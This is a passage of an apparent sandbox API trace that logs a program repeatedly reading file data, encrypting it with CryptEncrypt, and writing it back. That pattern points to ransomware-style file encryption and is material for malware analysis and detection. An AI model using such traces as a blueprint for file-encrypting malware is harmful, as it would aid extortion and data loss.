hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.529] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.531] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.532] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.534] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.534] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, 